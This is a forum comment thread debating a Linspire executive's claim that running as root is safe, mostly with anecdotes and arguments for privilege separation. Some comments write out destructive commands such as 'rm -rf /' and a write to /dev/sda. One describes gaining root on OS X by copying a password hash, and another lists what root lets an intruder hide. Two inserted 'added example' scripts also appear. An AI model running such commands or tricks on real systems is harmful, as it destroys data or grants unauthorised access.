I view security somewhat as an analogy to homes. If I live in my home, and I am the only person who lives in my home, I can have all of the doors keyed the same, and use the master key, and have the master key on me at all times. If my house is broken into, it is all my stuff. This is the same as running as root all the time. Now, I may have things that I'd prefer not to get stolen, then I'd have a safe. Now, I wouldn't have a house safe that is key operated that uses the same key as my front door. I just wouldn't. I might store a spare house key in my safe so that I know how many house keys are out there, etc, but I would not have my safe using the same key as my front door. This would be similar to having my own computer system, but not running as root. Instead I would use a non-privileged user account for most of my day to day operations and only use "root" or "administrator" in the case where I specifically need those privileges. Now, in a multi-person environment, things change. Let's use an apartment (or hotel, if you please) as the word picture this time. If I managed an apartment, I might have a master key for the entire building. My life would be a heck of a lot easier if all I ever carried was the master key. I could go into whatever apartment I wanted as I pleased. I would only ever have to worry about losing that one key. This is the same as running as root on a multi-user system. I have access to everything. Back to the apartment model. If the apartment manager is getting groceries one day, and someone steals his ONE key, the whole apartment is now wide open to the person who possesses the key. A smart apartment owner might instead have a safe where he stores that key. The only key he would carry would be the key to open his apartment, and that key would not open his safe. If his key were now stolen, there would be a lot less risk to the other people in the building. Similar in a multi-user computer situation. 
As a user (or a tenant), I'd rather have an admin (or manager) who is security conscious enough to take basic precautions. As an admin (or manager), I'd rather take some simple precautions as come cya. For a one person system, root or not root.... not a large difference.... that being said, not following "good practices" is a bad practice.
-- www.WhereHaveIBeen.com
There's an old bit of Unix Folklore about recovering from an "rm -rf /" by Mario Wolczko that originally made the rounds on Usenet in 1986.
It's one heck of a read.
The most valuable thing on my computer is probably the user name and password to my internet banking facility.. Not that I store them on the machine but I do type them in. Maybe running as non-root does give you access to all the data in a users home dir but it sure makes it more difficult to overwrite those libraries he's talking about with keylogging trojans that will harvest my passwords.
It IS THE SYSTEM, NOT THE USER!
:-)
Sorry for the caps but its true..
The user can accidentally run things that (s/)he may be ignorant of, and unfortunately have unforeseen side effects.
For example surfing to a webpage that contains viruses/spyware/crap/etc that executes upon load because of bugs in specific browsers...
Clicking an indiscriminate link by accident IS the user's fault, but it shouldn't be up to the system to do everything the user says like a brainless zombie mornic mornon (yes that's moron x2 - because not thinking before doing anything is a moronic thing to do, System and user alike!)
So as you can see, IF YOU FALL ASLEEP AT THE MOUSE, and you click something deadly because your system is a moron - reply to this with your happy thoughts about your infected/lost data.
Thanks! I love a good laugh
This man obviously hasn't met my sister: She attempts to open music files by selecting them in groups of 100, resulting in 100 sessions of xmms...I can only imagine her with root access.
When your entire home directory is deleted - all your work, all your bookmarks, all your records, all your porn - does it really MATTER that the rest of your system is still intact?
This message brought to you by the Society For Capability-Based Security (SFCBS).
Is equally hilarious.
But I've been running my Windows box with the Admin account forever. Never have I had any trouble with haxors or viruses. I would say this is due to the firewall and AV software I have running. Now, could I run an account with less privileges and not worry about AV or firewall? Maybe, but I'd be throwing out a lot of convenience of being able to change settings and install software without putting in a password.
Plus, I think some people are missing his point. OS's can be reinstalled. HD's can be reformatted. Files can be replaced. But once important personal data is in the wrong hands, there is no getting it back. He's saying that a system crash for most users is not as critical as having important data stolen. So as far as securing data, (for a single user) running as root is no more secure than running a limited account.
Don't take life so seriously. No one makes it out alive.
I'll run as root on my machine, but I think I'd better set up a separate, non-privileged account, for Mr Robertson. I don't think he's quite ready for / power.
Jon Green Cheyenne
Ever been root on one keyboard, and email (or Instant Message) on another?
Sometimes it's easy to start typing a message on the wrong keyboard, and into the root shell. Usually they won't be valid commands, but we all know Murphy's Law.
Many of us are the de-facto support for Windows users, usually friends and relatives. Do you know how incredibly easy it is to have a Windows system infected? You pretty much have to turn the computer on and that'll do 'er. Do you know why this is? It isn't the crappy kernel anymore -- they went over to an NT style one in XP. The reason it's trivial to infect a windows system is that the home users run with the administrative account all the time. That's also why real IT companies are somewhat harder to infect than home users -- they won't typically even give their users the admin account/password and security policies usually make it a firable offense to run as the administrative user full time (Basically you can do it until your system gets pwned and fucks the company network, then you're out.)
And while I typically expect upper management to be clueless, the CEO IS the spokesperson for their company and when a Linux Company tells me it's OK to run as root, I am typically discouraged from doing business with them because my impression of them is that they're a bunch of IDIOTS!
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
127.0.0.1.
Just don't tell anyone that it was me who told you.
“Wait for Hurd if you want something real” –Linus
So they'd type that?
It happens. I once accidentally typed an extra space when deleting core files on a production system:
Goodbye to a full day of work.. Of course, now that I am more experienced with *nix systems, I see that there were several issues with the system configuration:
Before you blow everything out of proportion, take a second to look at a few things from a different perspective:
1) The end user of Linspire is most probably a windows user trying to switch to something cheaper. The odds of Linspire being heavily used in a multiuser environment are bleak at best.
2) He makes a valid point, the most valuable information on your computer are things stored in your home directory. Credit card information, social security, emails, etc. Guess what . . . `rm -rf` will eliminate all of that even if you aren't root. Who cares if you accidentally wipe an X library, a reinstall will fix that, it won't get back your emails and resumes.
3) Everyone's argument for the flaw of running as root seems to stem from services running as root, which is something the end user of an operating system like Linspire shouldn't be expected to fix anyway, nor will most Linspire users be running apache servers and mysql servers, I'm just guessing at that.
A windows user or a linux newbie doesn't want to remember several account passwords just to change the IP address of their computer, or to reboot, or mount an external hard drive, or start Samba, etc. They want to know that they have permission to do those things out of the box. That's how windows is set up, that's what they want. Security should be handled by turning chrooted service invocation, firewalling, etc.
This isn't FreeBSD, tailor to your customers and make them happy, without them you don't have a business.
http://www.linspire.com/lindows_michaelsminutes_archives.php?id=153
And when building mass consumer devices, one has to add extra junk, even though it may not be strictly necessary. You add signs not to open things that no one should ever open. You add grills so that no one sticks a finger in places where no one should stick a finger in. You put covers on parts that really don't need covers, but need to be left alone. Making a consumer device requires a bit of extra thinking. Things are done not because they are required, but because they are necessary.
So, consumers need a special mode to run safely. It is precisely the lack of such a mode that made windows crash and burn when it became a commodity. No one needed it to start. But for some reason MS never developed the consumer OS. We now have the chance to do so using Linux.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
Actually, I'd think this would be an argument for more user separation, rather than as a somewhat reasonable point. Under his paradigm, it would be better to separate some tasks by (non-super) user, such as browsing for porn, online bill paying and educational games for your child. Clearly, the data, risks and reasonable problem vectors are different for these 3 activities and a quick out and login is not that much to ask for a little extra piece of mind.
While this is true, he neglects to mention one very important thing: you don't have to pass a test in order to mess around with your computer. Unless someone standardizes a competency test for computers which loads on first login for each user, there ought to be some level of protection for all the users on that machine (or any other machine connected to the internet) to prevent the "unlicensed driver" from causing harm.
The user can accidentally run things that (s/)he may be ignorant of, and unfortunately have unforeseen side effects.
This brings up a very good point about people who are new to computers. Most of the people that I've seen who have difficulty learning how to use a computer fear them. Actually, not the computer per se, but rather they fear that they are going to break it. If they try doing something they don't fully understand, they are afraid they will cause irreparable harm to the computer.
Strong privilege separation makes this a non-issue. As a regular user on linux, I would have a seriously difficult time causing serious harm to the box through anything I might do. I might screw up my data, or the appearance of things, but in the end, I cannot break the OS.
Under Windows, I can do all kinds of bad things. I've heard countless stories of people who are smart about how they use their computer coming home to find that it's useless because their kid downloaded a worm. It's one thing when the kid breaks their account, it's another when the whole operating system has to be re-installed from scratch.
This sig has been temporarily disconnected or is no longer in service
OS X has it right in this regard. Even the administrator runs as a normal user for most of the time. If they want to install something such as an update, they must use sudo to do it. At the very least that means that trojans have an extra hoop to jump through.
On Windows (or Linspire) if the vast majority of users are running with root it presents a much more attractive attack surface. Aside from that, it prevents users from themselves - e.g. stopping some dumb user from cleaning up their machine like deleting etc/ for example.
Michael Robertson should know this. In fact I suspect he does know this and employs this kind of rhetoric because Linspire has traditionally thrown all the security switches to make it one of the least secure Unices ever. At least it offers you the choice of a logon and password which is a start. Really though Linspire should adopt the Mac model. The fact that OS X makes it virtually transparent means that it's not a massive burden on the user to figure out.
Even from a business perspective, less destroyed machines and less exploits is obviously good sense. But who knows - perhaps Linspire loves support calls for the revenue they generate.
If we all login as root then everyone could see my hidden pr0n dir!!!
i have run os x and one of the ppc linux distros as root and and i find that doing so just messes stuff up. i can only say that it just never works right. i wish i had some specific instances, but i only know i don't do it regularly for a reason (or many reasons, as i've had the root gnomes bite me once too many times). thanks, but i'll be computing as admin, mr. linspire guy.
clackerd (forgot my login at work)
temporary signature
The reason that Robertson didn't get the answer to why not to "run as root" is twofold.
1.) He didn't want to hear the answer when it was told him.
2.) probably 99% of people who know that you shouldn't "run as root" don't know absolutely why themselves. They have a pretty good idea, but someone they respect and trust (and who is correct) told them it was stupid.
The other 1% who could have told him why, weren't consulted. Nor will they be.
It's no accident that Linspire (Lindows) is modeled after Windows, and it contains Windows' greatest fundamental security flaw.
Mikey, what is a bot? And how are they born?
For most of my work, I log in as Fred.
For anything on the net, I log in as Bill.
Almost none of my data requires web access to process. Anything I download as Bill is readable by Fred.
This seems pretty bullet proof to me. Am I kidding myself?
almost Word for word, this guy has been posting this same text around different sites for 2 years. It has sort of reached goatse status (ie effing annoying). Just ignore it
It says it all and you're a fool to ignore what Unix started out as and what dangerous idiocy is still contained within its frightening depths. Like a nuclear reactor, it has its uses but should always be treated with great respect. If you're relying on the reactor to produce needed power and not contaminate the countryside, then leaving the control room wide open to any child that walks in is like leaving the average person in root on any given *nix box that is being relied on. Either thing is stupid and asking for trouble.
It's not for nothing I half-rejoice at the option of using Run As on XP Pro but still await the concept of the machine not running every freaking thing as root. Until then, Windows will still be massively vulnerable as will every *nix box administered by someone following this guy for advice. Thankfully, the OpenBSD adherent where I work would laugh themselves into an asthmatic attack if they read his statement.
If my grammar and spelling are off, I am [distracted/tired/careless] (take your pick)
As a professional hacker, I'll give you the 25 cent reasons.
1) Only root can forge packets. I have to get root to steal IP addresses and adjust routing tables most of the time.
2) Only root can install kernel modules. Kernel modules are a great way to hide from prying eyes.
3) Root can debug any process. If I can debug another process, my program can spread to that process giving me complete control of it.
4) Getting root is noisy. If actually wants that box and not just to use it as a relay of some sort, he generally will need root to take the credit card numbers, corporate bid info, etc. Local exploits are among the noisiest and are the most likely to get caught by a good syscall IDS.
5) Only root has access to most of the log files. If I'm not perfect when I take over a box, I've got to adjust the logs. I have to be root in most cases.
6) Only root has raw disk access. If I want to hide all my stuff, the best way is to directly modify the filesystem. You need raw disk access for that.
etc, etc, etc
Yes, 99% of my machine will not be affected. But guess what? I'm still losing that text document, which, to me is a hell of a lot more important than losing /bin/ls (which I can just reinstall). I think this is where Michael was heading, before he went down that road of overgeneralization. There's no safe way for me to protect that document from a malicious program.
Also, you speak about keeping important files listed under a different user-- here's the issue: you shouldn't need to do that. If I have to authenticate every time I want to save a gif from Photoshop, that doesn't make for a good user experience at all.
Lastly, you say: If I so desired, I could limit the login / password for my MySQL account to only allow row INSERTs and SELECTs, but no DELETEs or DROPs.
But you don't, right? Why not? Because you're willing to take the risk that your MySQL login won't get swiped. So where's the acceptable level of risk? Michael seems to think that Linux has good enough security to make running as root not that big of a deal.
YHBT YHL HAND
Profanity is the language all programmers know best.
http://www.securityfocus.com/columnists/144/comment/18387#MSG
http://business.newsforge.com/comments.pl?sid=24159&op=&threshold=0&commentsort=0&mode=thread&tid=111&tid=2&tid=3&tid=31&pid=15234#15239
oops i meant ./bladir
If I wasn't root, I wouldn't have hurt a thing.. Instead, as being root I just killed my entire machine due to hitting enter by accident..
There are of course MANY other examples of why root is bad, but this is an easy example.. And with how easy it is to typo...
---- Booth was a patriot ----
on any multi-user environment, you're already running multiple users. In a single-user environment, you might as well run as root. Anyone (you, or something pretending to be you) can make a file called "ls" in /tmp. If this you is a user-account, it can completely trash everything you care about. If this you is actually root, it can not only trash everything you care about, but also trash a bunch of things you care nothing about! And it can even open a back door in two fewer lines of C than if it didn't have root, using methods which people who attack desktop systems don't care about too much anymore because it's not as efficient to control!
-- 'The' Lord and Master Bitman On High, Master Of All
"Honey, what's this journal entry about Las Vegas?" :-)
This seems to be drifting off topic, but while we're talking about ways to avoid the catastrophe of rm -rf / just consider replacing rm altogether.
./this ./or ./that
I just threw together a bash script to keep an indexed "trash" directory of everything I delete. Instead of typing
$rm -rf
I just run the script
$trash
and it gets moved into "${TRASH}/`date +%Y.%m.%d_%H.%M.%S`/". I keep an index of these files and run another script:
$restore this
to undelete it. A couple more scripts let me check out the size/contents of the trash directory, empty the trash, etc.
It's been a few years since I instituted this command-line recycle bin, and I have never accidentally deleted anything since. I also have a really hard time believing I'm the only one who does this.
Not that I post on slashdot or anything.
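The poster's scripts are not shown, so here is an added example (my own sketch, not the poster's code) of the same idea in POSIX sh: `trash` moves its arguments into a timestamped directory under `$TRASH` (assumed default `$HOME/.trash`) and records them in an index file, `restore` puts the most recently trashed copy back, and the one thing `trash` flatly refuses is the root directory itself.

```shell
#!/bin/sh
# Added example, not the poster's own scripts: a minimal command-line recycle bin.
# Layout (assumed): $TRASH/<stamp>.XXXXXX/<n>/<name> holds each trashed item, and
# $TRASH/index holds one "<slot dir><TAB><original absolute path>" line per item.
# Source this file (". ./trash.sh") and use "trash PATH..." / "restore PATH".

TRASH="${TRASH:-$HOME/.trash}"

# Absolute path of a name that may no longer exist; fails if its parent is gone.
abspath() {
    dir=$(cd "$(dirname "$1")" 2>/dev/null && pwd) || return 1
    printf '%s/%s\n' "${dir%/}" "$(basename "$1")"
}

# trash PATH... : move the named files/directories into a fresh timestamped
# directory (one numbered slot per item, so equal basenames never collide).
trash() {
    [ $# -gt 0 ] || { echo "usage: trash PATH..." >&2; return 1; }
    mkdir -p "$TRASH" || return 1
    # the mktemp suffix keeps two runs in the same second apart
    dest=$(mktemp -d "$TRASH/$(date +%Y.%m.%d_%H.%M.%S).XXXXXX") || return 1
    n=0
    for p in "$@"; do
        [ -e "$p" ] || { echo "trash: no such file: $p" >&2; return 1; }
        # refuse to "move" the root filesystem (/, /., /usr/.. all resolve to /)
        if [ -d "$p" ] && [ "$(cd "$p" && pwd)" = / ]; then
            echo "trash: refusing to trash '$p'" >&2
            rmdir "$dest" 2>/dev/null
            return 1
        fi
        abs=$(abspath "$p") || return 1
        n=$((n + 1))
        slot="$dest/$n"
        mkdir "$slot" && mv "$abs" "$slot/" || return 1
        printf '%s\t%s\n' "$slot" "$abs" >> "$TRASH/index"
    done
}

# restore PATH : put the most recently trashed copy of PATH back where it was.
restore() {
    target=$(abspath "$1") || { echo "restore: parent of '$1' is gone" >&2; return 1; }
    # the last matching index line is the most recent copy
    slot=$(awk -F'\t' -v t="$target" '$2 == t { s = $1 } END { if (s != "") print s }' \
        "$TRASH/index" 2>/dev/null)
    [ -n "$slot" ] || { echo "restore: '$1' not in trash" >&2; return 1; }
    [ ! -e "$target" ] || { echo "restore: '$target' already exists" >&2; return 1; }
    mv "$slot/$(basename "$target")" "$target" || return 1
    # drop the consumed index line and tidy the emptied directories
    awk -F'\t' -v s="$slot" -v t="$target" '!($1 == s && $2 == t)' "$TRASH/index" \
        > "$TRASH/index.tmp" && mv "$TRASH/index.tmp" "$TRASH/index"
    rmdir "$slot" "$(dirname "$slot")" 2>/dev/null || true
}

# trash_list : what is in the trash, oldest first.  trash_empty : discard it all.
trash_list() { [ -f "$TRASH/index" ] && cat "$TRASH/index"; }
trash_empty() { [ -n "$TRASH" ] && [ -d "$TRASH" ] && rm -rf "$TRASH" && mkdir -p "$TRASH"; }
```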
rm -Rf / as nonroot will make you give a sigh of relief.
That sounds like a workaround to make up for a design flaw in the command-line interface to me.
No, it illustrates that some portions of the computer's storage space have need to be protected. And that sometimes users do need to alter them, but not generally.
It's just as easy to take a big chunk of the Windows directory and start trashing stuff with the GUI as well. If you give users the means to manipulate persistent storage (which you do need to do because as the article says, data is king) then you also have to have some way to gently steer them away from utter disaster. How have you not heard tales of users trying to free up space on an HD deleting some crucial part of Windows? I have!
"There is more worth loving than we have strength to love." - Brian Jay Stanley
The reason why he's able to even phrase some sort of odd point about root is that he hasn't *got* Unix yet. Given 65k possible UIDs on his private box, he chooses to use only one for his "non-root" usage, and then claim that all his personal eggs are in one basket.
Doh! Of course they are, if you put them all in a single basket then they're all at risk of being broken together.
But if that were how Unix were meant to be run then we'd only need two UIDs, one for "root" and one for "user". Well fortunately Unix presupposes that we're less dumb than that.
If he got off his ass and put different datasets under different users and shared the lot through read-only permissions and separate write spaces, then he wouldn't be making such silly comments about root not being more risky.
Jeez.
"The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
I tend to agree with Robertson in this case.
See, the problem is that if a malicious hacker can convince a user to execute a program as a normal user, he/she might also be able to convince a person to su to root and execute/install the program. Root isn't the be all/end all of solutions that many unix users claim. Neither are antivirus apps. The engineering of the hack isn't usually a technical one. It's a social one.
Believe me, I wish this wasn't the case. One day, I will experience bad judgement and be susceptible. For the MS bashers out there, Windows 2K and XP have admin privileges... has it helped?
I don't know why people even use linspire.
First of all, it offers NO choices for users.
(eg. KDE and nothing else)
Their dumb little Click `N Run or whatever "technology" isn't even fricking technology, it's the results of some 14-year-olds who think they know how to "m4x0r t3h l33t c0d3". And they make you pay like a dollar to download an OPEN SOURCE program. And the money they make off that? It doesn't go to the developers for the open source application. IT GOES RIGHT BACK TO LINSPIRE. There is NO credit where credit is due.
( @ 14 year olds : learn C; Its more fun )
Another thing, they're using a version of KDE that's a fricking year old! ( last time I checked )
And they somehow manage to f*ck the Keramik theme up in a terrible terrible way that simply wasn't deserved.
And now this moron is griping about other people griping about his idea to let users just be root?!
For f*ck's sake! That's just asinine! That's like sitting down and saying.. Hmm.. Wouldn't it be fun if I hit the wrong button and deleted all my most important files while playing with this pretty box with letters and numbers inside it that says BASH.
I dunno... They may have improved since last time I used Linspire ( back when it was called lindows ( oh shit I'm gonna get sued )) but, it would need to improve A LOT.
The one time when I used Linspire, I removed it and installed SuSE over it. ( I use Fedora Core now )..
If con is the opposite of pro. Then isn't congress the opposite of progress?
that's like running windows ...
--- Sigmentation Fault - Comments Dumped
Any exploitable program you run as another user will still need a local escalation exploit in order to do anything harmful.
That's fine, but he has a point. How much actual real-world good does that do? It does plenty of theoretical good, but so does making the speed limit 10 MPH. By far the better solution is to make sure that the system is safe from remote attacks.
By far the better solution for safe sex is to get rid of all STD's.
Seriously. Answer me this -- do you administer servers?
I run *all* my daemons in chroot jails as non-root users. Why? If someone hacks in through an exploit in Apache, they have compromised a small subset of my system. I notice and react quickly, and they don't actually do any damage. But if I run as root, and someone compromises Apache, my system is not under my control anymore. At least, without a lot of hard work.
Any program run as root/suid root can cause a hole, no matter how small or trivial the program is.
So, As Seen On TV, you now have a new project.
Verify that the code used in a Linux distro on the desktop is secure from all vulnerabilities. I would start with the kernel, then move to the X server and the window manager, and then the applications.
See you in thirty years!
"...Jimmy destroyed all my files for my book report! and it's due tomorrow!"
Since a decent majority of open source developers actually give, to use your phrase, a flying fuck about standards, it's generally not in their best interests to promote use of something that isn't a standard, will never be a standard and would be completely undesirable as a standard. Additionally, if it can't be ported across architectures then including it would do a hell of a lot of damage to firefox's geek cred, and hence developer base.
Having said that, I think a plugin that allowed you to use activeX is a cool idea. I just don't think that tying the browser down to any one platform is a great idea. If you're particularly keen to produce an ActiveX version, go fork the codebase.
For the love of God, please learn to spell "ridiculous"!!!
Microsoft can and does get away with being that arrogant. In the face of callous indifference to whether their software works and the number of heart attacks that problems with it cause, one might as well be arrogant back.
This isn't the middle east peace process. Making a concession to Microsoft by including their vulnerable ActiveX tech does not mean they will make some concession by fixing X number of bugs in return. Once you have ActiveX in Firefox, Firefox isn't safe anymore and you might as well run IE.
Linspire has a nice building, I used to walk past it every day. Bad traffic though in the afternoon.
What keeps me going is my inertia.
Even on a single-user system, there is a damn good reason to run non-root: otherwise, if an attack makes its way in, you'll have no way to know about it. That's because every utility you could use to verify the integrity of the binaries and libraries and kernel you use can be altered by root.
Not everyone takes proper advantage of the root privilege separation. Popping up dialog boxes asking you to enter your root password, for example, was a terrible design decision on the part of most distros. And sudo is almost always misused. But properly done, root privsep is the only way you can reasonably know you're running a clean system.
I hope I can remember the details of this correctly. Here goes. Some time ago (maybe 5 years ago) I was running linux on a ppc box. I wanted to play a .au file. The sound device was something like /dev/scd. All I needed to do was
cat soundfile.au > /dev/scd
I typed
cat soundfile.au > /dev/sda
Whoops. Yes, there is a reason not to run as root. I admit the mistake was dumb but if I wasn't root I would have been protected from myself.
I haven't seen a rebuttal that gives a good solution yet. Michael Robertson is right about data being the most important, but seems to think that having users run as non-root means that changing the date will require a password (which is a "no no" for ease of use).
This problem can easily be solved by making all non-critical configuration tasks (e.g. setting the date) run using sudo behind the scenes. Changing the date as a non-root user shouldn't require a root password (unless you're real paranoid about bugs in your date setting code allowing crackers to exploit date-triggered viruses, or something...)
As for requiring a password, the only real solution is biometric, and that will be a while in coming. But most grannies aren't going to be changing hardware settings unless they are comfortable entering passwords. And if they aren't, they shouldn't be changing hardware settings anyway...
Life's a lot like money-- you spend it, then it's gone. Spend wisely.
I used to work on a p2p video conferencing system. These types of software are rarely, if at all, bundled with standard distributions. Further, most video conferencing software requires root access for installation, some even require that you're root in order to execute them. I'll be the first to admit that I've installed hardware drivers without knowing the source of all of the parties who developed it. At best, I'll have a certain degree of trust with the hardware vendor who distributes it, but who knows if even they know the true source of the code.
I'm curious though: it takes a fair amount of time to actually wipe out say, 10gb of data. So I wonder if you rm -rf / and then immediately hit ctrl-c just how much you lose (or if you even really lose anything since rm probably just removes the file entry, as opposed to overwriting the data with zeros or noise...)
The root account is disabled automatically.
You read that right. You want to do something that requires root access?
sudo.
Anything that requires root prompts you with a dialog box, explaining in mostly clear language.
Running as root is like running with scissors.
I used to always work under root, until one night. I was extremely tired and no longer really knew what I was doing. I only remember typing in "rm *" to remove all the content from the directory, however I was not in the folder I wanted to delete the files from, but in "/". Of course, except for a few files none of the important system data & folders were removed - I didn't type "rm -rf *". :)
It was an extremely careless and stupid mistake, however I realized that it would be safer to just create a user account and "su" when I need to - so when I'm in another one of those funky moods I will be harmless because I'll never get my funky 19 char root password right
here is MY solution to this.
we need a stack file system, where the base file system is / and the stacked file systems are difference files for each user.
for instance.
/
/home
/home/username.diff.img
notice no folders in home, just difference files.
login
mount -o diff_filesystem /home/username.diff.img /
this mounts a filesystem right on top of the old file system, and gives full read/write access to / BUT all changes are saved to the diff.img rather than the / filesystem. this would allow unprivileged users to install programs (if allowed to by making rpm/apt-get/emerge/etc etc suid root or something) and alter many many settings BUT not be able to mess up the base system OR other users.
i know that this is a generic and incomplete solution as no user should have access to another user's files BUT this could be handled in the stack filesystem module forbidding access to other home directories or root definable files and folders.
so root could modify /etc/difffilesystem.exemptions when logged in as root and adding a line
/etc/difffilesystem.exemptions -wrx
would make it so the average user could not wrx that file or
/home/* -wrx
/home/$USER.diff.img +wrx
would deny access to /home and then allow access to that user's home only.
i do this because unix file permissions would not be valid because any changes to the files would be written in the difference file so no changes would be made. of course the exemptions file should have an option
/path/to/file/or/folder/* =unixfilepermissions
or something like that to use the base filesystem's permissions for those files.
so the AVERAGE user would have an exemptions file like
#base config
/* =unixfilepermissions
/etc/difffilesystem.exemptions -wrx
/home/$USER.diff.img +wrx
#other options.
while a more privileged user would get
##commented out for privileged user
#/* =unixfilepermissions
/home/* -wrx
/etc/difffilesystem.exemptions -wrx
/home/$USER.diff.img +wrx
so, the exemptions file would allow some users to install software via traditional install programs like apt-get or rpm without the need to modify those programs OR run as root.
it would allow you to limit the folders users could modify so they could not re-run daemons with different settings in their userspace after editing the configs.
and it would allow a side effect of making the user's home directory a single file with its own filesystem. the / could be ext3 but the user's home folder and all modifications could be reiserfs.
AND the root filesystem would always be intact.
just some thoughts.
thanks for your time
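As an added example (not the poster's code, and not any real stacked-filesystem module), here is a small evaluator for the exemptions file described in the post above. The line format, the $USER expansion, trailing /* matching everything below a directory, last-rule-wins ordering, and the full read/write default for unlisted paths are all assumptions about what the poster intended; the two sample files are constructed from the post's sketches.

```python
"""Evaluator for the per-user exemptions file sketched in the post above.

Added example, not code from the post or from any real stacked filesystem.
Every detail of the format is an assumption drawn from the post: one rule per
line, "<path-glob> <mode>", where the mode is "+<bits>" (grant), "-<bits>"
(deny) or "=unixfilepermissions" (defer to the base filesystem's own
permissions); "#" starts a comment; "$USER" expands to the login name; a
trailing "/*" covers everything below that directory; later rules override
earlier ones; and a path no rule mentions gets the diff layer's full
read/write access, which is the post's stated default.
"""
from __future__ import annotations

from dataclasses import dataclass

BITS = ("r", "w", "x")


@dataclass(frozen=True)
class Rule:
    pattern: str            # path pattern with $USER already substituted
    action: str             # "grant", "deny" or "unix"
    bits: frozenset[str]    # which of r/w/x the rule applies to


def parse_exemptions(text: str, user: str) -> list[Rule]:
    """Parse an exemptions file for one login name; malformed lines raise."""
    rules: list[Rule] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<path> <mode>', got {raw!r}")
        pattern, mode = parts
        pattern = pattern.replace("$USER", user)
        if mode == "=unixfilepermissions":
            rules.append(Rule(pattern, "unix", frozenset(BITS)))
        elif mode[:1] in ("+", "-") and mode[1:] and set(mode[1:]) <= set(BITS):
            action = "grant" if mode[0] == "+" else "deny"
            rules.append(Rule(pattern, action, frozenset(mode[1:])))
        else:
            raise ValueError(f"line {lineno}: unknown mode {mode!r}")
    return rules


def matches(pattern: str, path: str) -> bool:
    """'/dir/*' covers every path below /dir; anything else is an exact match."""
    if pattern.endswith("/*"):
        return path.startswith(pattern[:-1])     # keep the trailing slash
    return path == pattern


def decide(rules: list[Rule], path: str) -> dict[str, str]:
    """Per-bit outcome for `path`: "grant", "deny" or "unix"; the last matching
    rule for each bit wins, so a broad deny can be followed by a narrow grant."""
    outcome = {bit: "grant" for bit in BITS}     # assumed default: diff layer allows all
    for rule in rules:
        if matches(rule.pattern, path):
            for bit in rule.bits:
                outcome[bit] = rule.action
    return outcome


def permitted(rules: list[Rule], path: str, bit: str, base_fs_allows: bool) -> bool:
    """Final yes/no for one access bit. `base_fs_allows` is what the base
    filesystem's unix permissions would say; it is consulted only for "unix"."""
    verdict = decide(rules, path)[bit]
    if verdict == "unix":
        return base_fs_allows
    return verdict == "grant"


# Constructed sample files modelled on the two the post describes.
AVERAGE_USER_EXEMPTIONS = """\
#base config
/* =unixfilepermissions
/etc/difffilesystem.exemptions -wrx
/home/* -wrx
/home/$USER.diff.img +wrx
#other options.
"""

PRIVILEGED_USER_EXEMPTIONS = """\
##commented out for privileged user
#/* =unixfilepermissions
/etc/difffilesystem.exemptions -wrx
/home/* -wrx
/home/$USER.diff.img +wrx
"""


if __name__ == "__main__":
    rules = parse_exemptions(AVERAGE_USER_EXEMPTIONS, "alice")
    for p in ("/etc/passwd", "/etc/difffilesystem.exemptions",
              "/home/bob.diff.img", "/home/alice.diff.img"):
        print(p, decide(rules, p))
```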
Is he the guy who started with MP3.com? what does he know about Unix (and Linux) administration? He sounds like not too much.
'cause if it's safe he should post his login and pass here.
The _real_ operating systems out there (read UNIX) have taught us that permissions are one of the more important stuff in systems security. Unix takes this concept to a new point with the "everything is a file" approach, so using a single set of permissions (file system permissions) you can limit a user to only see certain files, only use certain programs, or only use certain printers, only connect devices into a certain port, etc. ...
Even windorze and apple understood that this was needed, and they implemented it (In the case of m$, implemented poorly, in the case of Apple, Stolen).
And now this guy (Who has proven to be a bloodsucker trying to be the new bill gates using the efforts of the Free Software community, and not giving back a shit to it (since every piece of crap they make is proprietary), they also have got a record on spyware and other shit) Tries to tell us that we were wrong, and that we should just drop permissions all along?, Come on
WTF am I doing replying to an AC at 5 A.M on a Friday night?
So all these years later, and NONE of the shells do a trap for rm -Rf /, even the rm command should prevent that or at least ask an interactive question.
I don't think the guy said, make every service run as root, I think he meant running your X/apps as root.
But I like the OSX model of asking for the root password, though once I lost it and I actually used a normal user account to 'reset' the root password to what I wanted to - All I did was copy the crypted string of USERX into the string for ROOT in some System Admin Config util there and bingo I got root access easily....
Liberty freedom are no1, not dicks in suits.
"I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't."
If you run bad stuff it can't fuck up your stack.
(Hey! I did it!)
OS = Windows XP
Administrator = All_Local_Users
If History = Multiple_Viral_WebPages Then
My_Day = Very_Bad
End If
End.
I dare you to mod this redundant mod +0/-1
This was brought to you by the Department of Redundancy Department
This is hearsay, but I believe there were some root exploits in some "older" versions of IRC. There was a time when remote users could easily transfer files to your system by way of IRC. Who knows what happened after the software was downloaded, but suffice it to say that software in pre-development usually doesn't come with polished security.
There have been some very good research projects done on how to build a more secure system, and some of the most amazingly effective ones have been the ones that challenge the basic assumptions of "best practice".
MIT Kerberos takes the view that no machine on the network can be implicitly trusted; access to network services is controlled by tickets, mediated by a ticket distribution service with which each user and service has a pre-shared key. This works even for systems in which the local operating systems have no internal access control mechanisms whatsoever.
Capability-based systems essentially throw out the classic security model of users, roles and permissions, replacing them with a system of nonforgeable references by means of a combination of memory protection and cryptographically strong naming.
Finally, people need to come to terms with the fundamental fact that content-based security schemes are a losing proposition (1, 2). Virus scanners, adware scanners, porn blockers, spam filters, and even national customs departments all face the same problem: they can only inspect what goes by and apply a list of tests to winnow bad items. There is strong economic pressure to find ways to bypass these types of checkpoints, so new tricks are constantly being invented, only to be compensated for by the guardians; thus the guardians are always a step behind.
...when you're writing a game...tweak the difficulty of "Easy" to something [your mother] can cope with. -- onion2k
...forgive my ignorance, but what about running Yast Online Update, or apt-get, where you have to be root,but running as a normal user?
Hmmmmm....
the main point is eventually we will have to trust ourselves as root; whether we're running SELinux or CAS (Code Access Security). security must be managed, not just locked away.
An elevator has only six possible states: going up, going down, or stopped, multiplied by doors open or doors closed. While getting into those states may have required skill in old elevators, the complexity was inherently limited.
